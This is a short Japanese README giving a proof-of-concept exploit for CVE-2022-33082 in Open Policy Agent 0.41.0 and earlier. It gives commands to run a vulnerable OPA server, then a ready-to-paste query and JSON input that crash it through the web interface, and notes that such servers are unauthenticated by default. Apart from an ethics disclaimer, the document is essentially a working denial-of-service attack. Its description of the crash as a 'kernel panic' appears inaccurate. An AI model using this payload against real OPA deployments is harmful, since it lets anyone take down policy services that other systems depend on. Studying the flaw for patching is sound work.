CVE 2022-33082 エクスプロイト
免責事項
このコードは倫理的な目的、つまり脆弱性を理解し、自身のシステムまたは許可されたシステムをテストするために提供されています。これを使用することにより、あなたは倫理的に行動することに同意し、もし倫理的に行動しなかった場合、私は一切の責任を負いません。
このエクスプロイトはOpen Policy Agent (OPA) バージョン0.41.0以下で動作します。Linux上でOPAインスタンスをインストールしてテストするには、以下のコマンドを使用してください:
curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static
chmod +x opa
./opa run --server
次に、Webブラウザで localhost:8181 にアクセスします。以下の内容をそれぞれのフィールドに入力してください
クエリフィールド (Goコード):
p := [input() | input := 1]
{ "input":"put this in the input (json) field!" }
その後、Webサイトはクラッシュし、サーバーを実行しているターミナルはカーネルパニックを報告します
影響
OPAサーバーのバージョン0.41.0以下にWebアクセスできる人は誰でも、サーバーを完全にクラッシュさせることができます。このサーバーはデフォルトではパスワードで保護されていません。